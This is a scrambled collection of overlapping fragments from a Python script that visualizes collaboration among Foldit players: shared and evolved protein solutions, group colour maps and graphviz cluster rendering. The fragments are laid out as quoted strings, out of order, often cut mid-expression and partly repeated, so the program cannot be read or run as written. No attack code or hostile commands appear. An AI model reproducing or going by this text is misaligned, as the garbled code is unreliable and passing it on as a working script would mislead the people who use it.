fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{}", "= {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid", "children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s:", "l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs)", "= get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for", "matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] 
==", "label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start = min(e.timestamp for e in evolves)", "euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in roots:", "remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype == '2' and", "in a shared solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda", "action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids: render_collab(pid)", "gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items():", "p in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not", "9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos", "group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)]", "PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def", "% (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid):", "root.gid, [soln_lookup[sid] for sid in sids] if sids else [], {c.name: c.energy *", "get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return s.uid for", "get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if", "for sid in sids] if sids else [], {c.name: c.energy * c.weight for", "= True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges", "if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique():", "import colorsys import subprocess import argparse import os import csv import json import", "get_source(e)['header']['score'])), # lambda e: 
(get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if", "child = Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components},", "# create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda", "on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start =", "groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid) # uid_source_grouped = { # uid:", "{tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x:", "import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import", "int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map(", "float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) ->", "# for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids =", "for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb", "for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and", "4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source", "e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg", "0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d:", "in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid, pdbs,", "in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p)", "= \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else 
\"diamond\" # c.node(\"{}@{:.2f}\".format(uid,", "pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()),", "for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <=", "output raw source, then use command line graphviz tools to fix cluster layout", "len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid:", "p in l.pdb_infos] if r.lines else []) + ([p for l in r.evol_target_lines", "(get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in # uid_grouped if uid not in active_uids}", "pandas as pd import numpy as np import matplotlib.pyplot as plt from graphviz", "didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda e: e.uid)", "child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for", "gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid,", "_, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid)", "* 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] == {} or p['header']['uid'] == uid", "# evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target),", "for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] =", "lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) ->", "subprocess import argparse import os import csv import json import logging from itertools", "for x in pdb_infos if not is_corrupted(x.pdl, 
x.uid)] def render_collab(data): user_colors = {}", "target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg)", "sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front = [(1, c)", "> 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup, child_lookup): collabs =", "parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for", "then use command line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid)", "Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs in evolves_by_source[root_tag].items():", "for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use command line", "x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df =", "children = [] for uid, pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p:", "df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in sum(pdb_infos.values, [])} shared =", "'1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy),", "group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves))) # evoling_start", "# while len(front) > 0: # ntab, cur = front.pop() # print(\" \"*ntab,", "for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start", "# front = [(1, c) for c in collab.children] # while len(front) >", "Digraph 
from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids from util import PDB_Info,", "sum(pdb_infos.values, [])} shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d:", "e: euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k: list(g) for", "p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in", "return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str: if s.scoretype", "== '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e:", "in # uid_grouped if uid not in active_uids} # screen out anyone who", "Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info)", "lambda d: [x for x in d if int(x.sharing_gid) == 0 and x.scoretype", "+ 0.9 * (evoling_start - start) / (end - start), 0.7) # evolving_time", "{gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in", "{} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid", "groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid]", "return collabs # for collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) #", "g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g in", "gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid,", "{k: list(g) for k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))}", 
"and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict = {}", "cdict[gid] = col_to_str(c) groups_uids = {gid: [uid for _, uid in g] for", "for c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in", "for x in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and", "for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda", "for root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab", "in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype ==", "p.energy) for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda", "r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid,", "cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c in", "List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0", "e.uid), lambda e: e.uid) # group by evolver uid_source_grouped = { uid: {k:", "= c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'},", "passive_evolves]) # cm = plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for", "{}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves)", "groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g", "len(gids) <= 10 else 'tab20') # for gid, c in zip(gids, cm.colors): #", "source, then use command line graphviz tools to fix cluster layout outname =", "Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands = e.pdl[-2::-1] i = 0 while", "lambda e: 
euid_lookup[e.sid]) # group by evolver uid_source_grouped = { uid: {k: list(g)", "return children def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique():", "in cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+')", "= {} # gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for", "{gid: [uid for _, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda", "# output raw source, then use command line graphviz tools to fix cluster", "and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 +", "util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib", "'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid] = col_to_str(c) groups_uids", "evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} #", "pdbs in evolves_by_source[root_tag].items(): best = min(pdbs, key=lambda p: p.energy) child = Collaborator(uid, collab.gid,", "shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in", "uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by evolver", "cur.tag) # front.extend([(ntab + 1, c) for c in cur.children]) if __name__ ==", "if sids else [], {c.name: c.energy * c.weight for c in root.energy_components}, tag,", "not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid)", "e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), # lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in #", "in d if int(x.sharing_gid) > 1 
or (int(x.sharing_gid) == 0 and x.scoretype ==", "{uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in", "in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not", "pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end", "# front.extend([(ntab + 1, c) for c in cur.children]) if __name__ == '__main__':", "style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values():", "p.scoretype == '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color =", "= plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid, c in", "in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if not is_corrupted(x.pdl,", "evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3',", "in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])}", "'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid),", "group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape':", "def get_team_structures(data, soln_lookup, child_lookup): collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team", "True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for", "passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) ==", "new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids:", "def get_tag(s: PDB_Info) -> ShareTag: return 
ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) ->", "g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid,", "c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for", "label=uid) # for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') #", "key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid,", "while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i", "c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color':", "get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag:", "evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes and", "# nodes and edges for shared solutions for uid, pdbs in shared.items(): gid", "= get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start)", "p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x", "p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos):", "import get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple, List,", "and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) #", "# dot.subgraph(sg) # do it again, this time for people who just loaded", "= uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid 
in new_uids: new_uids.remove(prev_uid)", "List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info)", "== 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda", "actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, #", "axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup", "pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df = data[data.pid == pid]", "# evoling_start = min(e.timestamp for e in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1", "list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if", "= {target for targets in uid_source_grouped.values() for target in targets} roots = sum(([p", "c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, [])", "in shared.items(): gid = pdbs[0].gid for p in pdbs: if p.scoretype == '2'", "evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children def get_team_structures(data, soln_lookup,", "gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag", "- start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on", "ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs", "-array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple):", "group_colors.items(): colors.remove(color) if prev_uid in new_uids: 
new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >=", "in l.pdb_infos] if r.lines else []) + ([p for l in r.evol_target_lines for", "{ # uid: {k: min(g, key=lambda p: p.energy) for k, g in #", "\"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy),", "[]) evolves_by_source = {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)),", "and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to", "for uid, evolved_targets in uid_source_grouped.items(): # gid = list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid)", "= df.apply(lambda r: sorted(([p for l in r.lines for p in l.pdb_infos] if", "dot.subgraph(cluster) # output raw source, then use command line graphviz tools to fix", "in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) >", "import matplotlib.pyplot as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from", "groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1", "in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters =", "fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then", "evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict)", "= list(evolved_targets.values())[0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) # for target, evolve in evolved_targets.items(): #", "or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for", "[] for root in roots: tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup)", "= 
list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)})", "= {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x", "df.apply(lambda r: sorted(([p for l in r.lines for p in l.pdb_infos] if r.lines", "get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s:", "pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p in", "plt.get_cmap('tab10' if len(gids) <= 10 else 'tab20') # for gid, c in zip(gids,", "tag, xs in evolves_by_source.items()} collabs[pid] = [] for root in roots: tag =", "e: e.uid) # group by evolver uid_source_grouped = { uid: {k: list(g) for", "-o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True) class ShareTag(NamedTuple): uid: str energy: float class", "start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for l", "on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in", "tag = get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid]", "csv import json import logging from itertools import groupby import pandas as pd", "lambda e: get_source_tag(e))} for uid, g in uid_grouped} # further group by source", "for e in evolves))) # evoling_start = min(e.timestamp for e in evolves) #", "shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm = plt.get_cmap('tab10'", "# node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in", "pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for 
pid in", "p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p", "pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\" source: ShareTag children: List[\"Collaborator\"]", "uid): return all(p['actions'] == {} or p['header']['uid'] == uid or p['header']['uid'] == '0'", "(end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{}", "set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves])", "'2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid])", "import groupby import pandas as pd import numpy as np import matplotlib.pyplot as", "for pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min()", "== {} or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] ==", "evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2", "== {} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def col_to_str(col):", "in evolver_clusters.values(): # dot.subgraph(sg) # nodes and edges for shared solutions for uid,", "for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return", "x in pdb_infos if not is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for", "== uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99 for p in", "== '2' and not is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28,", "axis=1) shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x", "shared.items(): gid = 
pdbs[0].gid for p in pdbs: if p.scoretype == '2' and", "'0' or p['header']['score'] == 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x", "pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved: shape = \"box\" if p.scoretype == '1'", "k, g in groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for", "= {tag: list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s:", "in data.pid.unique(): print(pid) df = data[data.pid == pid] start = df.timestamps.apply(min).min() end =", "if len(gids) <= 10 else 'tab20') # for gid, c in zip(gids, cm.colors):", "lambda d: [x for x in d if int(x.sharing_gid) > 1]), []), key=lambda", "ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c)", "shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for p in", "sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again, this time for people", "node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'}) group_clusters = {gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in", "\"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in cur.children]) if __name__", "group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e", "for gid, uids in groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors", "and edges for shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid", "solution but didn't do anything # uid_grouped = groupby(sorted(passive_evolves, key=lambda e: e.uid), lambda", "uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy) for k, g", "dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 
'repulsiveforce': '2'}, node_attr={'style': 'filled'}, edge_attr={'color': '#00000055'})", "{k: min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda e:", "__name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args()", "uids[:] for prev_uid, color in group_colors.items(): colors.remove(color) if prev_uid in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid]", "it again, this time for people who just loaded in a shared solution", "is_corrupted(x.pdl, x.uid)] def render_collab(data): user_colors = {} for pid in data.pid.unique(): print(pid) df", "further group by source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), #", "graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets in uid_source_grouped.items():", "not in active_uids} # screen out anyone who later actively evolved # #", "= get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids]", "df) for uid in df.uid} euid_lookup = {pdb.sid: get_evolver_uid(pdb, evol_lines_lookup[pdb.uid]) for pdb in", "0: # ntab, cur = front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab +", "group by source evolved_targets = {target for targets in uid_source_grouped.values() for target in", "return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return", "None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in sorted(collabs['2003642'],", "nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) #", "evolved_targets = {target for targets in uid_source_grouped.values() for target in 
